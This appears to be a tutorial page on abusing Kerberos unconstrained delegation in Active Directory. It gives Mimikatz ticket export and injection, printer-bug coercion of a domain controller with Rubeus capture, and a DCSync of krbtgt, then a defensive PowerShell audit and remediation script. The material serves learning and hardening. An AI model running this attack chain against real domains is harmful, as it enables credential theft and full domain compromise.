Introduction
- When set for a particular service account, unconstrained delegation allows that service to delegate to any service on any resource in the domain as the user.
- When unconstrained delegation is enabled, the DC places a copy of the user's TGT inside the TGS (service ticket). When the service ticket is presented to the server, the TGT is extracted from it and cached in LSASS. The server can then reuse the user's TGT to access any other resource as that user.
- This can be used to escalate privileges if we compromise a computer with unconstrained delegation and a Domain Admin connects to that machine.
Enumerate computers and users with unconstrained delegation (PowerView and the ActiveDirectory module respectively):

```powershell
Get-DomainComputer -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-ADUser -Filter {TrustedForDelegation -eq $true}
```

After compromising the server where unconstrained delegation is enabled, we must trick or wait for a domain admin to connect to a service on the application server. Then export the cached tickets and inject the admin's TGT:

```powershell
Invoke-MimiKatz -Command '"sekurlsa::tickets /export"'
Invoke-MimiKatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
```

Printer Bug
- This is a method to trick a high privilege user to connect to a machine with Unconstrained Delegation.
- A feature of MS-RPRN (Microsoft-Print System Remote Control) allows any domain user (Authenticated User) to force any machine running the Spooler service to connect to a second machine of the domain user's choice.
Start Rubeus in monitor mode on the unconstrained-delegation host, then coerce the domain controller to connect to it:

```powershell
Rubeus.exe monitor /interval:5 /nowrap
MS-RPRN.exe \\domain-controller-fqdn \\unconstrained-delegation-enabled-fqdn
```

In Rubeus, the base64 TGT of the domain controller's machine account will appear. Inject it and run DCSync:

```powershell
Rubeus.exe ptt /ticket:<base64_tgt>
Invoke-MimiKatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
```

This attack can work across forests if TGT delegation is enabled.
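The enumeration commands above and the printer bug section both point at the same defensive checks: which non-DC objects carry unconstrained delegation, which privileged accounts can still have their TGT forwarded, and whether the Spooler service is running on domain controllers. The following audit script is an added example written for this page; it is not part of the original notes or of any tool named here. It assumes the ActiveDirectory RSAT module is installed, that the caller can read the domain and reach the DCs over WinRM, and that the identities in the commented remediation lines (`APPSRV01$`, `admin.user`) are placeholders.

```powershell
# Added defensive audit example (not from the original notes). Assumes the
# ActiveDirectory RSAT module, read access to AD, and WinRM access to the DCs.
Import-Module ActiveDirectory

function Get-UnconstrainedDelegationAudit {
    # Domain controllers legitimately carry TrustedForDelegation; anything else is a finding.
    $dcNames = (Get-ADDomainController -Filter *).Name

    $computers = Get-ADComputer -Filter { TrustedForDelegation -eq $true } `
        -Properties TrustedForDelegation, OperatingSystem, LastLogonDate
    $users = Get-ADUser -Filter { TrustedForDelegation -eq $true } `
        -Properties TrustedForDelegation, ServicePrincipalName, LastLogonDate

    $findings = @()
    foreach ($c in $computers) {
        if ($dcNames -contains $c.Name) { continue }   # expected on DCs, skip
        $findings += [pscustomobject]@{
            Object    = $c.SamAccountName
            Type      = 'Computer'
            OS        = $c.OperatingSystem
            LastLogon = $c.LastLogonDate
            Issue     = 'Unconstrained delegation on a non-DC host'
        }
    }
    foreach ($u in $users) {
        $findings += [pscustomobject]@{
            Object    = $u.SamAccountName
            Type      = 'User'
            OS        = $null
            LastLogon = $u.LastLogonDate
            Issue     = 'Unconstrained delegation on a user/service account'
        }
    }
    return $findings
}

function Get-UndelegatableAdminGap {
    # Domain Admins should be in Protected Users or flagged "Account is sensitive
    # and cannot be delegated"; otherwise their TGT is forwarded to any
    # unconstrained-delegation host they authenticate to.
    $protected = (Get-ADGroupMember -Identity 'Protected Users' -Recursive).distinguishedName
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Get-ADUser -Properties AccountNotDelegated |
        Where-Object { -not $_.AccountNotDelegated -and $protected -notcontains $_.DistinguishedName } |
        Select-Object SamAccountName, AccountNotDelegated
}

function Get-SpoolerOnDomainControllers {
    # The printer bug needs a running Spooler service on the coerced host;
    # DCs rarely need it, so a running Spooler there is a finding.
    foreach ($dc in Get-ADDomainController -Filter *) {
        $svc = Invoke-Command -ComputerName $dc.HostName -ScriptBlock { Get-Service -Name Spooler }
        [pscustomobject]@{
            DomainController = $dc.HostName
            SpoolerStatus    = $svc.Status
            StartType        = $svc.StartType
        }
    }
}

# Usage: run all three checks and review the tables.
Get-UnconstrainedDelegationAudit | Format-Table -AutoSize
Get-UndelegatableAdminGap       | Format-Table -AutoSize
Get-SpoolerOnDomainControllers  | Format-Table -AutoSize

# Remediation for confirmed findings (placeholder identities; uncomment to apply):
# Set-ADAccountControl -Identity 'APPSRV01$' -TrustedForDelegation $false   # move to constrained/RBCD
# Set-ADAccountControl -Identity 'admin.user' -AccountNotDelegated $true     # TGT no longer forwardable
```

The first function reproduces the page's `TrustedForDelegation` filters but drops domain controllers from the result, since they are trusted for delegation by design and would otherwise drown out the real findings. The second addresses the precondition of the attack (a privileged TGT arriving at the delegating host): an admin in Protected Users or with `AccountNotDelegated` set does not get a forwardable TGT, so the mimikatz export step above yields nothing useful for that account. The third checks the Spooler precondition of the printer bug on each DC; `Get-Service` is run through `Invoke-Command` so the check works on both Windows PowerShell and PowerShell 7.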